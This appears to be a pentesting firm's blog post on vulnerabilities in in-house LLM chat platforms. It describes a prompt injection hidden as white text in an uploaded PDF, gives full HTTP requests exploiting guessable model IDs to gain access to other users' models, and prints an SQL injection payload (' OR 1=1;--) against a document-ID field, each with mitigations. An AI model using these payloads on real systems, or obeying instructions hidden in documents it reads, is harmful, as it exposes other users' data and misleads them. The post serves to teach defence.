Artificial intelligence (AI) is transforming the business world. Large language model (LLM) platforms in particular are increasingly finding their way into companies across a wide range of industries. Many are choosing in-house hosted solutions to protect sensitive data and maintain control over their information. This ensures that internal data is not used as training material for public models such as ChatGPT or Gemini.
However, as usage grows, so do security requirements. To meet these requirements, our security analysts at usd HeroLab combine proven methods from web application pentesting with in-depth expertise in LLM-based platforms. In recent months, they have thoroughly analyzed numerous platforms and identified recurring vulnerabilities.
In this blog post, our colleagues Gerbert Roitburd and Florian Kimmes show which three classes of vulnerabilities they encountered most frequently, what risks these vulnerabilities pose, and explain their impact using real-world findings to illustrate how attackers can exploit them in practice.
Prompt injections are among the most well-known vulnerabilities of LLM platforms
Prompt injections occur when user input is accepted into the system prompt or retrieval chain without being checked. This allows attackers to manipulate the model's original instructions either by adding to them or overwriting them completely. The result: the model performs actions that are neither intended nor desired. Our analysts regularly encounter this vulnerability in pentests. They were able to successfully demonstrate prompt injections in numerous LLM platforms. The following vulnerability demonstration illustrates the concrete effects of such manipulation:
In a test system, users were allowed to upload documents whose content was then incorporated into the response generation. To demonstrate the vulnerability, our analysts prepared a PDF document with a malicious instruction in white text on a white background. This meant that the instruction was only visible to the LLM, but not to the users. Our PDF file looked like this:

The text extracted from the PDF was transferred to the system prompt after uploading, thereby overwriting the developer's instruction. As a result, the link actually appeared in the AI chatbot's responses. Injecting a malicious prompt allows attackers to do the following, for example:
- Insert phishing links
- Bypass security policies
- Force liability-relevant or legally binding statements
- Unintentionally disclose internal information
- Manipulate downstream workflows if responses are processed automatically
There is currently no infallible mitigation measure against prompt injections. Prompt injections therefore represent an inherent risk of the underlying technology, as LLMs are by design unable to distinguish between system instructions and user input. Nevertheless, there are a number of techniques that can be used to reduce the likelihood of successful prompt injection attacks or mitigate their effects.
Our analysts recommend: A golden rule when using LLM platforms: The LLM used must never have access to more or higher-privileged resources than the users themselves. In other words, the language model must never serve as an access restriction for functions or information. To reduce the likelihood of a successful attack, the outputs of the LLM can be checked using an additional “guardrail LLM.” User inputs and model outputs are passed to the guardrail LLM, which decides whether a question/answer pair is malicious in nature.
Broken access control remains the most significant vulnerability in web applications and also affects LLM platforms
Since 2021, this vulnerability has ranked first in the OWASP Top 10 for web applications. our penetration tests confirm that LLM platforms are not exempt from this, as confirmed by the OWASP Top 10 for LLM platforms and generative AI. Many LLM platforms allow the storage of personal assistants, chat histories, or user-defined system prompts. However, if role and rights checks are incomplete, attackers can access sensitive data.
The cause usually lies in insecurely developed or incorrectly configured authentication and authorization logic. As a result, access to confidential resources is not adequately controlled, sometimes with serious consequences: data can be viewed, modified, or even deleted.
A concrete example from our pentests shows how easy it is to exploit this vulnerability. As regular users, our analysts were able to manipulate other users' chatbots without the appropriate authorization. First, we queried the available models:
GET /v2/chat/availableModels HTTP/2 Host: example.com Authorization: Bearer ey[REDACTED] [...]
The HTTP response provided exactly two models that a user has access to: Test Model and Default Model, each of which was assigned an ID. Using the ID, which is ascending, additional models could be guessed subsequently. The guessed models could then be modified, for example, users could be added.
The request to edit the model with the ID 134 in order to authorize an additional user can be made as follows:
POST /v2/studio/skills/update/134 HTTP/2
Host: example.com
Content-Length: 532
Sec-Ch-Ua-Platform: "Linux"
Authorization: Bearer ey[REDACTED]
Content-Type: application/json
[ ... ]
{
"_id": "134",
"availability": {
"allUsers": false,
"domain": "",
"groups": [],
"onDemand": false,
"users": [
"8a06a98e-be31-46ed-9fa1-44b15dbc7633"
]
},
"deployment": "gpt-4o-mini",
"description": "SampleDescription",
"icon": "sms",
"meta": {
"created": 1740586740.77619,
"owner": "m-rvwo-ncrw17ty-fdqo96-i75w",
"updated": 1740587027.443857,
"contributors": [
"m-rvwo-ncrw17ty-fdqo96-i75w"
]
},
"settings": {
"example": "",
"negative": "",
"personalization": false,
"positive": "","skillContext": "",
"knowledge": null
},
"title": "Custom skill1",
"api_keys": []
}
Within the request, the owner and user who should have access to the model were specified. The API accepted the request and issued the following message:
```
HTTP/2 200 OK
Date: Wed, 26 Feb 2025 16:49:10 GMT
Content-Type: application/json
[ ... ]
{"response":"Skill updated","result":true}
Mit dem initialen HTTP-Anfrage können wieder die verfügbaren Modelle abgefragt werden.
GET /v2/chat/availableModels HTTP/2
Host: example.com
Authorization: Bearer ey[REDACTED]
[...]
```
From now on, the model with ID 134 is also accessible to users.
```
HTTP/2 200 OK
Date: Wed, 26 Feb 2025 16:51:23 GMT
Content-Type: application/json
Content-Length: 329
Access-Control-Allow-Credentials: true
{
"response": [
{
"defaultModel": false,
"description": "Test Model",
"icon": "sms",
"id": "130",
"image": true,
"name": ""
},
{"defaultModel": true,
"description": "Default Model",
"icon": "sms",
"id": "132",
"image": true,
"name": "GPT 4o mini"
},
{
"defaultModel": false,
"description": "SampleDescription",
"icon": "sms",
"id": "134",
"image": true,
"name": "GPT 4o mini"
}
],
"result": true
}
```
Attackers can thus edit all other models within the application. This also applies to models created by other users that contain sensitive information such as documents. These models are then visible and accessible to unauthorized users.
Our analysts recommend: Every action within the web application must be secured by a reliable authorization check. In particular, access to sensitive content and functions must be restricted to authorized users only. Access should be implemented using an access matrix or a global access control mechanism.
LLM platforms bring new challenges: Traditional pentesting methods are not sufficient to reliably detect prompt injections and associated risks such as uncontrolled data exfiltration or attacks on downstream components. Many new platforms underestimate these threats. Our pentests show that recurring vulnerabilities in particular can be systematically exploited. Anyone who wants to operate LLMs securely must understand their peculiarities and secure them in a targeted manner.
Florian Kimmes, Senior Security Analyst, usd AG

SQL Injections in LLM platforms
LLM platforms also need to store application data and inputs. This includes, for example, the contents of prompts, UUIDs from chats, or even names of created models or users. In practice, relational databases are usually used for this purpose. User inputs often flow directly or indirectly into dynamically composed SQL queries. If these inputs are accepted unfiltered, this creates a vulnerability for SQL injections. Attackers can then manipulate the query by specifically changing parameter values. This allows them to bypass authentication mechanisms, read sensitive information, or modify data records.
Three factors contribute to the frequent occurrence of this vulnerability:
- High complexity of secure input validation
- Tight development cycles
- Lack of awareness of this vulnerability
A practical example from our pentests illustrates the risk: The tested application offered to upload documents and then ask the chatbot about the content of these files. The UUID of the referenced document was transmitted in the document_ids parameter:
POST /v1/api/ai-service/doc_qa/invoke HTTP/1.1
Host: internal-api-a.example.com
[...]
------WebKitFormBoundarywd29GBhV7ZAJL78A
Content-Disposition: form-data; name="id"
doc_qa
------WebKitFormBoundarywd29GBhV7ZAJL78A
Content-Disposition: form-data; name="input_data"
{"text":"Wie ist das geheime Passwort?","text_fields":
{"document":""},"message_history":[],"main_prompt":""}
------WebKitFormBoundarywd29GBhV7ZAJL78A
Content-Disposition: form-data; name="documents_number"
0
------WebKitFormBoundarywd29GBhV7ZAJL78A
Content-Disposition: form-data; name="document_ids"
786bf0b1646ff5ae3b46d83fdb729a53c234b1125ccfc401e8ea7117fe797948
------WebKitFormBoundarywd29GBhV7ZAJL78A--
The server inserted this value into the following SQL statement without checking it:
SELECT * from documents WHERE cmetadata::json->> 'doc_id' IN ('786bf0b1646ff5ae3b46d83fdb729a53c234b1125ccfc401e8ea7117fe797948');
Since the document in question did not contain a password, the chatbot's response was accurate: “No answer found in the document provided.” However, during the pentest, it emerged that document_ids was vulnerable to SQL injection. The following excerpt shows the HTTP request with the SQL injection payload:
POST /v1/api/ai-service/doc_qa/invoke HTTP/1.1
Host: internal-api-a.example.com
[...]
------WebKitFormBoundarycpAd0SUogYSB5PG1
Content-Disposition: form-data; name="id"
doc_qa
------WebKitFormBoundarycpAd0SUogYSB5PG1
Content-Disposition: form-data; name="input_data"
{"text":"Wie ist das geheime Passwort?","text_fields":
{"document":""},"message_history":[{"message_type":"human","text":"Wie ist
das geheime Passwort?"},{"message_type":"ai","text":"Ich habe keine Antwort
in dem bereitgestellten Dokument gefunden.","image":null}],"main_prompt":""}
------WebKitFormBoundarycpAd0SUogYSB5PG1
Content-Disposition: form-data; name="documents_number"
0
------WebKitFormBoundarycpAd0SUogYSB5PG1
Content-Disposition: form-data; name="document_ids"
786bf0b1646ff5ae3b46d83fdb729a53c234b1125ccfc401e8ea7117fe797948') OR 1=1;--
-
------WebKitFormBoundarycpAd0SUogYSB5PG1--
This HTTP request would ensure that the dynamically generated SQL query to the database looks like this:
SELECT * from documents WHERE cmetadata::json->> 'doc_id' IN
('786bf0b1646ff5ae3b46d83fdb729a53c234b1125ccfc401e8ea7117fe797948') OR
1=1;-- -);
The condition 1=1 is always true, meaning that all documents are returned. The AI chatbot was therefore suddenly able to access information stored in completely different files. This would allow attackers to access the contents of all uploaded files.
Our analysts recommend: To avoid this risk, all user input should be treated as potentially malicious and never inserted directly into SQL statements. Instead, parameterized queries (prepared statements) should be used, as they separate data from logic and thus prevent targeted manipulation. In addition, server-side input validation should be implemented to prevent unwanted or incorrect inputs.
What do you need to consider with AI chatbots?
In addition to securing AI systems, well-known vulnerabilities remain a significant attack vector and therefore continue to be relevant. A web application penetration test can help to identify these vulnerabilities reliably. In addition, we can draw on specialist knowledge of typical vulnerabilities in LLMs and apply this knowledge specifically in our AI projects.
Gerbert Roitburd, Managing Consultant IT Security, usd AG

Do you want to improve the security of your LLM platform? Contact us, we will support you.



